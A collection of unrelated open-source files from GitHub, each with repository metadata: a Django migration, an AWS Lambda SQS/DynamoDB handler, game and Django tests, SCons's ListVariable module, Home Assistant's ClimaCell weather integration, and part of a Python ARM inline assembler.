page_id=home_page.id
)
HomePageTopMenuLink.objects.create(
caption="Про проект",
link_page_id=about_page.id,
sort_order=3,
page_id=home_page.id
)
HomePageTopMenuLink.objects.create(
caption="Відкритий API",
link_page_id=api_page.id,
sort_order=4,
page_id=home_page.id
)
home_page.depth = 2
home_page.numchild = 2
home_page.save()
class Migration(migrations.Migration):
dependencies = [
('cms_pages', '0002_auto_20150702_0240'),
]
operations = [
migrations.RunPython(populate_static_pages),
]
|
{
"content_hash": "4d74558a88be341cb1f0d6aafff20f2b",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 75,
"avg_line_length": 25.83132530120482,
"alnum_prop": 0.6072761194029851,
"repo_name": "dchaplinsky/garnahata.in.ua",
"id": "4de9166907f21d4f4ae5cd3c8b50748aae93d6c5",
"size": "2295",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "garnahata_site/cms_pages/migrations/0003_auto_20150702_0241.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "24360"
},
{
"name": "Dockerfile",
"bytes": "2329"
},
{
"name": "HTML",
"bytes": "82807"
},
{
"name": "JavaScript",
"bytes": "168113"
},
{
"name": "Python",
"bytes": "152194"
},
{
"name": "Shell",
"bytes": "1071"
}
],
"symlink_target": ""
}
|
import trollius as asyncio
import boto3
from concurrent.futures import ThreadPoolExecutor
from poll import Poll
from update_and_delete import UpdateAndDelete
import logging
logging.getLogger(
'botocore.vendored.requests.packages.urllib3.connectionpool'
).setLevel(logging.CRITICAL)
logging.getLogger('boto3.resources.action').setLevel(logging.CRITICAL)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
session = boto3.session.Session(region_name='ap-northeast-1')
sqs = session.resource('sqs')
sqs_client = sqs.meta.client
db = session.resource('dynamodb').meta.client
def handler(event, context):
logger.info("Start!")
executor = ThreadPoolExecutor(max_workers=1000)
main_loop = asyncio.new_event_loop()
main_loop.set_default_executor(executor)
asyncio.set_event_loop(main_loop)
poll = Poll(main_loop)
cal = poll.cal
update_and_delete = UpdateAndDelete(main_loop, executor)
table = event['table']
queue_url = event['queueUrl']
message_count = event['messageCount']
poll.messages(sqs, queue_url, message_count)
logger.info("Receive API count: {}".format(poll.fetch_count))
logger.info("Fetched messages: {}".format(poll.message_count))
update_and_delete.execute(sqs_client, db, queue_url, table, cal.stats)
logger.info("Update API count: {}".format(update_and_delete.update_count))
logger.info("Delete API count: {}".format(update_and_delete.delete_count))
logger.info("Delete Message count: {}".format(
update_and_delete.deleted_message_count))
main_loop.close()
executor.shutdown()
return "Lambda job finished successfully."
|
{
"content_hash": "1615e7c29c5fa638350d0821d8c0e886",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 78,
"avg_line_length": 30.12727272727273,
"alnum_prop": 0.7272178636089318,
"repo_name": "yxd-hde/lambda-poll-update-delete",
"id": "b3b2bfec36f67e2dcd641e18424d141248427f60",
"size": "1657",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "py-asyncio-boto3/main.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "8069"
},
{
"name": "Makefile",
"bytes": "980"
},
{
"name": "Python",
"bytes": "25797"
},
{
"name": "Shell",
"bytes": "144"
}
],
"symlink_target": ""
}
|
"""Test suite.
Copyright 2010-2015 Brandon Rhodes. Licensed as free software under the
Apache License, Version 2.0 as detailed in the accompanying README.txt.
"""
from unittest import TestCase
from adventure import load_advent_dat
from adventure.game import Game
class CommandTest(TestCase):
def setUp(self):
game = Game()
load_advent_dat(game)
self.words = set(w.synonyms[0].text for w in game.vocabulary.values())
self.words.remove('suspend')
def test_intransitive_commands_should_not_throw_exceptions(self):
for word in self.words:
game = Game()
load_advent_dat(game)
game.start()
game.do_command(['no']) # WOULD YOU LIKE INSTRUCTIONS?
game.do_command([word])
def test_transitive_commands_should_not_throw_exceptions(self):
for word in self.words:
game = Game()
load_advent_dat(game)
game.start()
game.do_command(['no']) # WOULD YOU LIKE INSTRUCTIONS?
game.do_command(['enter']) # so we are next to lamp
game.do_command([word, 'lamp'])
|
{
"content_hash": "0ae2e751dafe1d6e64763c36474ae79d",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 78,
"avg_line_length": 33.55882352941177,
"alnum_prop": 0.6222611744084137,
"repo_name": "devinmcgloin/advent",
"id": "beaba30a2884f06d8f5678006758f2095889e294",
"size": "1141",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "adventure/tests/test_commands.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "21560"
},
{
"name": "HTML",
"bytes": "1081"
},
{
"name": "Python",
"bytes": "99935"
}
],
"symlink_target": ""
}
|
"""Tests for voot application."""
from unittest import TestCase
from django.test import TestCase as DjangoTestCase
class TestSuiteTestCase(TestCase):
"""General test to make sure that the setup works."""
def test_test_suite_can_be_run(self):
self.assertTrue(True)
class ExampleTestCase(DjangoTestCase):
"""Tests for Example model class."""
fixtures = ['test_data']
urls = 'voot.tests.urls'
def test_example_view_is_callable(self):
resp = self.client.get('/example/')
self.assertEqual(resp.status_code, 200)
|
{
"content_hash": "838db65026f15304dad8d70437de88da",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 57,
"avg_line_length": 28.05,
"alnum_prop": 0.6898395721925134,
"repo_name": "berggren/django-voot",
"id": "5b4e6f8428bedfbc4683eddfabb8c753ed49f413",
"size": "561",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "voot/tests/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "3343"
}
],
"symlink_target": ""
}
|
"""engine.SCons.Variables.ListVariable
This file defines the option type for SCons implementing 'lists'.
A 'list' option may either be 'all', 'none' or a list of names
separated by comma. After the option has been processed, the option
value holds either the named list elements, all list elements or no
list elements at all.
Usage example:
list_of_libs = Split('x11 gl qt ical')
opts = Variables()
opts.Add(ListVariable('shared',
'libraries to build as shared libraries',
'all',
elems = list_of_libs))
...
for lib in list_of_libs:
if lib in env['shared']:
env.SharedObject(...)
else:
env.Object(...)
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Variables/ListVariable.py issue-2856:2676:d23b7a2f45e8 2012/08/05 15:38:28 garyo"
# Known Bug: This should behave like a Set-Type, but does not really,
# since elements can occur twice.
__all__ = ['ListVariable',]
import collections
import SCons.Util
class _ListVariable(collections.UserList):
def __init__(self, initlist=[], allowedElems=[]):
collections.UserList.__init__(self, [_f for _f in initlist if _f])
self.allowedElems = sorted(allowedElems)
def __cmp__(self, other):
raise NotImplementedError
def __eq__(self, other):
raise NotImplementedError
def __ge__(self, other):
raise NotImplementedError
def __gt__(self, other):
raise NotImplementedError
def __le__(self, other):
raise NotImplementedError
def __lt__(self, other):
raise NotImplementedError
def __str__(self):
if len(self) == 0:
return 'none'
self.data.sort()
if self.data == self.allowedElems:
return 'all'
else:
return ','.join(self)
def prepare_to_store(self):
return self.__str__()
def _converter(val, allowedElems, mapdict):
"""
"""
if val == 'none':
val = []
elif val == 'all':
val = allowedElems
else:
val = [_f for _f in val.split(',') if _f]
val = [mapdict.get(v, v) for v in val]
notAllowed = [v for v in val if not v in allowedElems]
if notAllowed:
raise ValueError("Invalid value(s) for option: %s" %
','.join(notAllowed))
return _ListVariable(val, allowedElems)
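# For illustration (hypothetical values), with allowedElems = ['gl', 'ical', 'qt', 'x11']:
#   _converter('none', allowedElems, {})    -> empty list, str() gives 'none'
#   _converter('all', allowedElems, {})     -> all elements, str() gives 'all'
#   _converter('x11,qt', allowedElems, {})  -> ['x11', 'qt'], str() gives 'qt,x11'
#   _converter('bogus', allowedElems, {})   -> raises ValueError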
## def _validator(key, val, env):
## """
## """
## # todo: write validator for pkg list
## return 1
def ListVariable(key, help, default, names, map={}):
"""
The input parameters describe a 'package list' option, thus they
    are returned with the correct converter and validator appended. The
result is usable for input to opts.Add() .
A 'package list' option may either be 'all', 'none' or a list of
package names (separated by space).
"""
names_str = 'allowed names: %s' % ' '.join(names)
if SCons.Util.is_List(default):
default = ','.join(default)
help = '\n '.join(
(help, '(all|none|comma-separated list of names)', names_str))
return (key, help, default,
None, #_validator,
lambda val: _converter(val, names, map))
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
{
"content_hash": "3ae8bc77a2bdd06b4e569b09386f5d39",
"timestamp": "",
"source": "github",
"line_count": 135,
"max_line_length": 114,
"avg_line_length": 33.266666666666666,
"alnum_prop": 0.6432865731462926,
"repo_name": "angad/libjingle-mac",
"id": "0763b29c465ccc570dbec74f3b462e5c5c553d00",
"size": "4491",
"binary": false,
"copies": "14",
"ref": "refs/heads/master",
"path": "scons-2.2.0/build/lib/SCons/Variables/ListVariable.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "2015946"
},
{
"name": "C++",
"bytes": "9306077"
},
{
"name": "Objective-C",
"bytes": "28091"
},
{
"name": "Perl",
"bytes": "50523"
},
{
"name": "Python",
"bytes": "4283804"
},
{
"name": "Shell",
"bytes": "1445083"
}
],
"symlink_target": ""
}
|
"""Weather component that handles meteorological data for your location."""
from datetime import datetime
import logging
from typing import Any, Callable, Dict, List, Optional
from homeassistant.components.weather import (
ATTR_FORECAST_CONDITION,
ATTR_FORECAST_PRECIPITATION,
ATTR_FORECAST_PRECIPITATION_PROBABILITY,
ATTR_FORECAST_TEMP,
ATTR_FORECAST_TEMP_LOW,
ATTR_FORECAST_TIME,
ATTR_FORECAST_WIND_BEARING,
ATTR_FORECAST_WIND_SPEED,
WeatherEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
LENGTH_FEET,
LENGTH_KILOMETERS,
LENGTH_METERS,
LENGTH_MILES,
PRESSURE_HPA,
PRESSURE_INHG,
TEMP_FAHRENHEIT,
)
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.sun import is_up
from homeassistant.helpers.typing import HomeAssistantType
from homeassistant.util import dt as dt_util
from homeassistant.util.distance import convert as distance_convert
from homeassistant.util.pressure import convert as pressure_convert
from . import ClimaCellDataUpdateCoordinator, ClimaCellEntity
from .const import (
CC_ATTR_CONDITION,
CC_ATTR_HUMIDITY,
CC_ATTR_OZONE,
CC_ATTR_PRECIPITATION,
CC_ATTR_PRECIPITATION_DAILY,
CC_ATTR_PRECIPITATION_PROBABILITY,
CC_ATTR_PRESSURE,
CC_ATTR_TEMPERATURE,
CC_ATTR_TEMPERATURE_HIGH,
CC_ATTR_TEMPERATURE_LOW,
CC_ATTR_TIMESTAMP,
CC_ATTR_VISIBILITY,
CC_ATTR_WIND_DIRECTION,
CC_ATTR_WIND_SPEED,
CLEAR_CONDITIONS,
CONDITIONS,
CONF_TIMESTEP,
CURRENT,
DAILY,
DEFAULT_FORECAST_TYPE,
DOMAIN,
FORECASTS,
HOURLY,
NOWCAST,
)
# mypy: allow-untyped-defs, no-check-untyped-defs
_LOGGER = logging.getLogger(__name__)
def _translate_condition(
condition: Optional[str], sun_is_up: bool = True
) -> Optional[str]:
"""Translate ClimaCell condition into an HA condition."""
if not condition:
return None
if "clear" in condition.lower():
if sun_is_up:
return CLEAR_CONDITIONS["day"]
return CLEAR_CONDITIONS["night"]
return CONDITIONS[condition]
def _forecast_dict(
hass: HomeAssistantType,
forecast_dt: datetime,
use_datetime: bool,
condition: str,
precipitation: Optional[float],
precipitation_probability: Optional[float],
temp: Optional[float],
temp_low: Optional[float],
wind_direction: Optional[float],
wind_speed: Optional[float],
) -> Dict[str, Any]:
"""Return formatted Forecast dict from ClimaCell forecast data."""
if use_datetime:
translated_condition = _translate_condition(condition, is_up(hass, forecast_dt))
else:
translated_condition = _translate_condition(condition, True)
if hass.config.units.is_metric:
if precipitation:
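            # Convert the imperial precipitation value (inches) to millimetres:
            # inches / 12 gives feet, distance_convert gives metres, * 1000 gives mm.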
precipitation = (
distance_convert(precipitation / 12, LENGTH_FEET, LENGTH_METERS) * 1000
)
if wind_speed:
wind_speed = distance_convert(wind_speed, LENGTH_MILES, LENGTH_KILOMETERS)
data = {
ATTR_FORECAST_TIME: forecast_dt.isoformat(),
ATTR_FORECAST_CONDITION: translated_condition,
ATTR_FORECAST_PRECIPITATION: precipitation,
ATTR_FORECAST_PRECIPITATION_PROBABILITY: precipitation_probability,
ATTR_FORECAST_TEMP: temp,
ATTR_FORECAST_TEMP_LOW: temp_low,
ATTR_FORECAST_WIND_BEARING: wind_direction,
ATTR_FORECAST_WIND_SPEED: wind_speed,
}
return {k: v for k, v in data.items() if v is not None}
async def async_setup_entry(
hass: HomeAssistantType,
config_entry: ConfigEntry,
async_add_entities: Callable[[List[Entity], bool], None],
) -> None:
"""Set up a config entry."""
coordinator = hass.data[DOMAIN][config_entry.entry_id]
entities = [
ClimaCellWeatherEntity(config_entry, coordinator, forecast_type)
for forecast_type in [DAILY, HOURLY, NOWCAST]
]
async_add_entities(entities)
class ClimaCellWeatherEntity(ClimaCellEntity, WeatherEntity):
"""Entity that talks to ClimaCell API to retrieve weather data."""
def __init__(
self,
config_entry: ConfigEntry,
coordinator: ClimaCellDataUpdateCoordinator,
forecast_type: str,
) -> None:
"""Initialize ClimaCell weather entity."""
super().__init__(config_entry, coordinator)
self.forecast_type = forecast_type
@property
def entity_registry_enabled_default(self) -> bool:
"""Return if the entity should be enabled when first added to the entity registry."""
if self.forecast_type == DEFAULT_FORECAST_TYPE:
return True
return False
@property
def name(self) -> str:
"""Return the name of the entity."""
return f"{super().name} - {self.forecast_type.title()}"
@property
def unique_id(self) -> str:
"""Return the unique id of the entity."""
return f"{super().unique_id}_{self.forecast_type}"
@property
def temperature(self):
"""Return the platform temperature."""
return self._get_cc_value(self.coordinator.data[CURRENT], CC_ATTR_TEMPERATURE)
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return TEMP_FAHRENHEIT
@property
def pressure(self):
"""Return the pressure."""
pressure = self._get_cc_value(self.coordinator.data[CURRENT], CC_ATTR_PRESSURE)
if self.hass.config.units.is_metric and pressure:
return pressure_convert(pressure, PRESSURE_INHG, PRESSURE_HPA)
return pressure
@property
def humidity(self):
"""Return the humidity."""
return self._get_cc_value(self.coordinator.data[CURRENT], CC_ATTR_HUMIDITY)
@property
def wind_speed(self):
"""Return the wind speed."""
wind_speed = self._get_cc_value(
self.coordinator.data[CURRENT], CC_ATTR_WIND_SPEED
)
if self.hass.config.units.is_metric and wind_speed:
return distance_convert(wind_speed, LENGTH_MILES, LENGTH_KILOMETERS)
return wind_speed
@property
def wind_bearing(self):
"""Return the wind bearing."""
return self._get_cc_value(
self.coordinator.data[CURRENT], CC_ATTR_WIND_DIRECTION
)
@property
def ozone(self):
"""Return the O3 (ozone) level."""
return self._get_cc_value(self.coordinator.data[CURRENT], CC_ATTR_OZONE)
@property
def condition(self):
"""Return the condition."""
return _translate_condition(
self._get_cc_value(self.coordinator.data[CURRENT], CC_ATTR_CONDITION),
is_up(self.hass),
)
@property
def visibility(self):
"""Return the visibility."""
visibility = self._get_cc_value(
self.coordinator.data[CURRENT], CC_ATTR_VISIBILITY
)
if self.hass.config.units.is_metric and visibility:
return distance_convert(visibility, LENGTH_MILES, LENGTH_KILOMETERS)
return visibility
@property
def forecast(self):
"""Return the forecast."""
# Check if forecasts are available
if not self.coordinator.data[FORECASTS].get(self.forecast_type):
return None
forecasts = []
        # Set default values; None is returned for keys that don't exist.
        # Override properties per forecast type as needed.
for forecast in self.coordinator.data[FORECASTS][self.forecast_type]:
forecast_dt = dt_util.parse_datetime(
self._get_cc_value(forecast, CC_ATTR_TIMESTAMP)
)
use_datetime = True
condition = self._get_cc_value(forecast, CC_ATTR_CONDITION)
precipitation = self._get_cc_value(forecast, CC_ATTR_PRECIPITATION)
precipitation_probability = self._get_cc_value(
forecast, CC_ATTR_PRECIPITATION_PROBABILITY
)
temp = self._get_cc_value(forecast, CC_ATTR_TEMPERATURE)
temp_low = None
wind_direction = self._get_cc_value(forecast, CC_ATTR_WIND_DIRECTION)
wind_speed = self._get_cc_value(forecast, CC_ATTR_WIND_SPEED)
if self.forecast_type == DAILY:
use_datetime = False
forecast_dt = dt_util.start_of_local_day(forecast_dt)
precipitation = self._get_cc_value(
forecast, CC_ATTR_PRECIPITATION_DAILY
)
temp = next(
(
self._get_cc_value(item, CC_ATTR_TEMPERATURE_HIGH)
for item in forecast[CC_ATTR_TEMPERATURE]
if "max" in item
),
temp,
)
temp_low = next(
(
self._get_cc_value(item, CC_ATTR_TEMPERATURE_LOW)
for item in forecast[CC_ATTR_TEMPERATURE]
if "min" in item
),
temp_low,
)
elif self.forecast_type == NOWCAST:
# Precipitation is forecasted in CONF_TIMESTEP increments but in a
# per hour rate, so value needs to be converted to an amount.
if precipitation:
precipitation = (
precipitation / 60 * self._config_entry.options[CONF_TIMESTEP]
)
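                    # e.g. with a rate of 0.12 in/hr and a 5-minute timestep
                    # (hypothetical values): 0.12 / 60 * 5 = 0.01 inches of rain
                    # for that interval.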
forecasts.append(
_forecast_dict(
self.hass,
forecast_dt,
use_datetime,
condition,
precipitation,
precipitation_probability,
temp,
temp_low,
wind_direction,
wind_speed,
)
)
return forecasts
|
{
"content_hash": "426b637939de7e8c5fd9ea2c7525a82f",
"timestamp": "",
"source": "github",
"line_count": 300,
"max_line_length": 93,
"avg_line_length": 33.263333333333335,
"alnum_prop": 0.6094799078063934,
"repo_name": "partofthething/home-assistant",
"id": "e5a24197d6bad12df9257d026a5597b6d98a47a0",
"size": "9979",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/climacell/weather.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1720"
},
{
"name": "Python",
"bytes": "31051838"
},
{
"name": "Shell",
"bytes": "4832"
}
],
"symlink_target": ""
}
|
"""ARM inline assembler.
This module allows creation of new functions in ARM assembler
(machine language) which can be directly called from Python.
The assembler syntax parsed by this module follows as closely as practical
the official ARM syntax.
"""
from functools import partial as _partial
import re as _re
import ctypes as _ctypes
from ctypes.util import find_library as _find_library
class AssemblerError(Exception):
"""Exception thrown when a syntax error is encountered in the assembler code."""
pass
_registers = dict(("r%d" % _i, _i) for _i in range(16))
# register name synonyms
for _i in range(4):
_registers["a%d" % (_i + 1)] = _registers["r%d" % _i]
for _i in range(8):
_registers["v%d" % (_i + 1)] = _registers["r%d" % (_i + 4)]
_registers["sb"] = _registers["r9"]
_registers["ip"] = _registers["r12"]
_registers["sp"] = _registers["r13"]
_registers["lr"] = _registers["r14"]
_registers["pc"] = _registers["r15"]
_status_registers = {"cpsr" : 0, "spsr" : 1}
_conditions = [
"eq", "ne", "cs", "cc",
"mi", "pl", "vs", "vc",
"hi", "ls", "ge", "lt",
"gt", "le", "", "nv"]
class _InstructionFormat:
format_fields = {
"0" : 1,
"1" : 1,
"A" : 1,
"B" : 1,
"c" : 1,
"x" : 1,
"s" : 1,
"f" : 1,
"CPNum" : 4,
"CRd" : 4,
"CRm" : 4,
"CRn" : 4,
"Cond" : 4,
"H" : 1,
"I" : 1,
"Imm24" : 24,
"L" : 1,
"N" : 1,
"Offset" : 0,
"Offset1" : 4,
"Offset2" : 4,
"Op1" : 0,
"Op2" : 3,
"Opcode" : 4,
"Operand2" : 12,
"P" : 1,
"Rd" : 4,
"RdHi" : 4,
"RdLo" : 4,
"RegisterList" : 16,
"R" : 1,
"Rm" : 4,
"Rn" : 4,
"Rs" : 4,
"S" : 1,
"Shift" : 3,
"U" : 1,
"W" : 1,
}
def __init__(self, format, length=32):
self.format = format
self.length = length
format = format.split()[::-1]
leftover = length - sum(self.format_fields[f] for f in format)
bit = 0
base = 0
mask = 0
offset = 0
fields = {}
for f in format:
bits = self.format_fields[f]
if bits == 0:
bits = leftover
if f == "1":
base = base + (1 << offset)
if f in "01":
mask = mask + (1 << offset)
else:
fields[f] = (offset, bits)
offset = offset + bits
assert offset == length
self.base = base
self.mask = mask
self.fields = fields
self.signature = " ".join(sorted(fields.keys()))
def match(self, n):
return (n & self.mask) == self.base
def encode(self, fields):
if len(fields) != len(self.fields):
missing = set(self.fields.keys()) - set(fields.keys())
if missing:
raise ValueError("Missing fields: " + " ".join(missing))
spurious = set(fields.keys()) - set(self.fields.keys())
raise ValueError("Spurious fields: " + " ".join(spurious))
base = self.base
for f in fields:
offset, bits = self.fields[f]
value = fields[f]
mask = (1 << bits) - 1
base = base | ((value & mask) << offset)
return base
class _ShiftSpec:
allowed_immediates = dict([(i, i % 32) for i in range(1, 33)])
def __init__(self, number, allowed_immediates=None, register_allowed=True):
self.number = number
if allowed_immediates is not None:
self.allowed_immediates = allowed_immediates
self.register_allowed = register_allowed
_shifts = {
"lsl" : _ShiftSpec(0, allowed_immediates=dict([(_i,_i) for _i in range(32)])),
"lsr" : _ShiftSpec(2),
"asr" : _ShiftSpec(4),
"ror" : _ShiftSpec(6, allowed_immediates=dict([(_i,_i) for _i in range(1, 32)])),
"rrx" : _ShiftSpec(6, allowed_immediates={1:0}, register_allowed=False)
}
_shifts["asl"] = _shifts["lsl"]
_comma_split_re = _re.compile(r"(?:(?:\[[^\]]*\])|(?:{[^}]*})|(?:\$.)|[^,])+|.")
def _comma_split(str):
return [item.strip() for item in _comma_split_re.findall(str) if item != ',']
class _OperandParser:
pc = 0
labels = {}
constant_pool_offset = 0
instruction = None
operand2_format = _InstructionFormat("Offset Shift Rm", 12)
library_cache = {}
memory_re = _re.compile(r"^\[(.*)\]\s*(!?)$")
regset_re = _re.compile(r"^{(.*)}$")
special_chars = {"space" : ord(' '), "newline" : ord('\n'), "tab" : ord('\t')}
control_flags = frozenset("cxsf")
def __init__(self, libraries):
self.constant_pool = []
self.constant_pool_dict = {}
self.libraries = [self.convert_library(lib) for lib in libraries]
def error(self, message):
instruction = self.instruction
full_message = "%s\nLine %d: %s" % (message, instruction.linenumber, instruction.code)
error = AssemblerError(full_message)
error.linenumber = instruction.linenumber
error.code = instruction.code
error.message = message
raise error
def convert_library(self, lib):
library_cache = self.library_cache
if isinstance(lib, str):
if lib not in library_cache:
library_cache[lib] = _ctypes.CDLL(_find_library(lib))
return library_cache[lib]
else:
return lib
def get_constant_pool_address(self, constant):
if constant in self.constant_pool_dict:
return self.constant_pool_dict[constant]
address = self.constant_pool_offset
self.constant_pool_offset = self.constant_pool_offset + 1
self.constant_pool.append(constant)
self.constant_pool_dict[constant] = address
return address
def lookup_symbol(self, str):
for lib in self.libraries:
try:
return _ctypes.cast(getattr(lib, str), _ctypes.c_void_p).value
except AttributeError:
pass
return None
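    # ARM data-processing immediates are an 8-bit value rotated right by an even
    # amount (2 * r, with r in 0..15).  For example, 0x3F000 is encodable: it is
    # the 8-bit value 0x3F with rotation field r = 10 (0x3F rotated right by 20 bits).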
def encode_immediate(self, n, checked=True):
r = 0
b = n & 0xFFFFFFFF
while r < 16:
if b < 256:
return (r << 8) | b
r = r + 1
b = ((b << 2) | (b >> 30)) & 0xFFFFFFFF # rotate left by two bits
if checked:
self.error("Immediate value cannot be assembled: %d" % n)
else:
return None
def encode_ldr_immediate(self, n, checked=True):
if n >= 0 and n < (1 << 12):
return n
elif checked:
self.error("Immediate offset cannot be assembled: %d" % n)
else:
return None
def parse_immediate(self, str, checked=False, prefix="#"):
if str and str[0] == prefix:
str = str[1:].strip()
try:
return int(str, base=0)
except ValueError:
pass
if str and str[0] == '$':
ch = str[1:]
if len(ch) == 1:
return ord(ch)
elif ch in self.special_chars:
return self.special_chars[ch]
result = self.lookup_symbol(str)
if checked and result is None:
self.error("Expected immediate value, got: %s" % str)
else:
return result
def parse_memory(self, str):
mo = self.memory_re.match(str)
if mo is None:
self.error("Expected memory location, got: %s" % str)
return [s.strip() for s in _comma_split(mo.group(1))], mo.group(2)
def parse_register(self, str, checked=False):
reg = _registers.get(str.lower(), None)
if reg is None and checked:
self.error("Expected register, got: %s" % str)
else:
return reg
def parse_status_register(self, str):
reg = _status_registers.get(str.lower(), None)
if reg is None:
self.error("Expected CPSR or SPSR, got: %s" % str)
else:
return reg
def parse_status_register_flags(self, str):
fields = str.split('_', 1)
if len(fields) == 2:
R = self.parse_status_register(fields[0])
flags = set(fields[1].lower())
if flags.issubset(self.control_flags):
flags = {f : 1 if f in flags else 0 for f in self.control_flags}
return (R, flags)
self.error("Expected CPSR_flags or SPSR_flags, got: %s % str")
def parse_regset(self, str):
mo = self.regset_re.match(str)
if mo is not None:
str = mo.group(1)
result = set()
for r in _comma_split(str):
r = r.strip()
r = r.split("-", 1)
if len(r) == 1:
result.add(self.parse_register(r[0].strip()))
else:
r1, r2 = r
r1 = self.parse_register(r1.strip(), checked=True)
r2 = self.parse_register(r2.strip(), checked=True)
result.update(range(min(r1, r2), max(r1, r2) + 1))
return result
def parse_signed_register(self, str, checked=False):
U = 1
if str and str[0] == "-":
U = 0
str = str[1:].strip()
return self.parse_register(str, checked), U
def parse_shift(self, str, allow_registers=True):
shift = str[:3]
shift_field = str[3:].strip()
try:
shift_spec = _shifts[shift.lower()]
except KeyError:
self.error("Expected shift, got: %s" % str)
if allow_registers and shift_spec.register_allowed:
shift_value = self.parse_register(shift_field)
if shift_value is not None:
return (shift_spec.number + 1, shift_value << 1)
shift_value = self.parse_immediate(shift_field, checked=True)
if shift_value in shift_spec.allowed_immediates:
return (shift_spec.number, shift_spec.allowed_immediates[shift_value])
else:
self.error("Shift with value of %d is not allowed" % shift_value)
self.error("Expected shift, got: %s" % str)
def parse_operand2(self, operands, encode_imm, allow_shift_register=True):
if len(operands) == 0:
return {"I":1, "Operand2": 0, "U": 1}
elif len(operands) == 1:
Rm, U = self.parse_signed_register(operands[0])
if Rm is not None:
return {"I":0, "Operand2": Rm, "U": U}
imm = self.parse_immediate(operands[0])
if imm is not None:
U = 1
encoded_imm = encode_imm(imm, checked=False)
if encoded_imm is None:
U = 0
encoded_imm = encode_imm(-imm, checked=False)
if encoded_imm is None:
encode_imm(imm, checked=True) # cause error
return {"I":1, "Operand2": encoded_imm, "U": U}
self.error("Expected register or immediate, got: %s" % operands[0])
elif len(operands) == 2:
Rm, U = self.parse_signed_register(operands[0], checked=True)
t, c = self.parse_shift(operands[1], allow_shift_register)
operand2 = self.operand2_format.encode({"Shift" : t, "Offset" : c, "Rm" : Rm})
return {"I":0, "Operand2": operand2, "U": U}
def parse_dpi_operand2(self, operands):
fields = self.parse_operand2(operands, self.encode_immediate)
if fields["U"] == 0:
self.error("Minus sign (-) not allowed in this instruction")
del fields["U"]
return fields
def parse_load_store(self, operands):
W = 0
if len(operands) == 1:
pre_indexed = 1
operands, bang = self.parse_memory(operands[0])
if bang:
W = 1
else:
pre_indexed = 0
operands0, bang = self.parse_memory(operands[0])
if len(operands0) != 1:
self.error("Expected [register], got: %s" % operands[0])
if bang:
self.error("In post-indexed _mode, ! is not allowed")
operands = operands0 + operands[1:]
fields = self.parse_operand2(operands[1:], self.encode_ldr_immediate, allow_shift_register=False)
fields["P"] = pre_indexed
fields["W"] = W
fields["I"] = 1 - fields["I"]
fields["Rn"] = self.parse_register(operands[0], checked=True)
return fields
_instructions = {}
class _Instruction:
code = ""
label = ""
opcode = ""
operands = []
linenumber = 0
pc = 0
def __init__(self, code):
self.code = code
code = code.split(";", 1)[0]
code = code.split(":", 1)
if len(code) == 1:
code = code[0]
else:
self.label = code[0].strip()
code = code[1]
code = code.strip()
if code:
code = code.split(None, 1)
self.opcode = code[0].strip().lower()
if len(code) > 1:
self.operands = _comma_split(code[1])
def parse(self, parser):
parser.instruction = self
parser.pc = self.pc
if self.opcode not in _instructions:
parser.error("Invalid opcode: %s" % self.opcode)
return _instructions[self.opcode](parser, self.operands)
_dpi_format = _InstructionFormat("Cond 0 0 I Opcode S Rn Rd Operand2")
_branch_format = _InstructionFormat("Cond 1 0 1 L Offset")
_bx_format = _InstructionFormat("Cond 0 0 0 1 0 0 1 0 1 1 1 1 1 1 1 1 1 1 1 1 0 0 L 1 Rm")
_load_store_format = _InstructionFormat("Cond 0 1 I P U B W L Rn Rd Operand2")
_load_store_multi_format = _InstructionFormat("Cond 1 0 0 P U S W L Rn RegisterList")
_mul_format = _InstructionFormat("Cond 0 0 0 0 0 0 0 S Rd 0 0 0 0 Rs 1 0 0 1 Rm")
_mla_format = _InstructionFormat("Cond 0 0 0 0 0 0 1 S Rd Rn Rs 1 0 0 1 Rm")
_clz_format = _InstructionFormat("Cond 0 0 0 1 0 1 1 0 1 1 1 1 Rd 1 1 1 1 0 0 0 1 Rm")
